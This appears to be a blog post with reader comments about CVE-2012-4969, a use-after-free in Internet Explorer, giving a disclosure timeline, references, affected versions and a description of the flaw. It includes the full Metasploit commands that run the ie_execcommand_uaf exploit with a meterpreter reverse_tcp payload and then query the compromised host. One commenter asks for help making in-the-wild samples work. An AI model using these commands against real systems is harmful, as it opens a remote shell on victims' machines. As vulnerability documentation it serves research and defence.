Timeline :
Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17
PoC provided by :
unknown
eromang
binjo
sinn3r
juan vazquez
Reference(s) :
OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063
Affected version(s) :
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.
Commands :
use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.178.33 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid
I have tried using this JRE ROP after installing JRE version 1.5.0.50 on windows 7 machine. However The exploit does not seems to be working for me. Please note I have used some wild samples not the POC. This address 0x7c37653d appears to be unknown. Getting access violation. Could some one tell me what am i doing wrong here?
Fail internet explorer 😀 excellent
hi,
i wonder why the console says “using msvcrt ROP”, when i tried it, it says “using JRE ROP” ?
thx
klaus
Fantastic. By brazil 🙂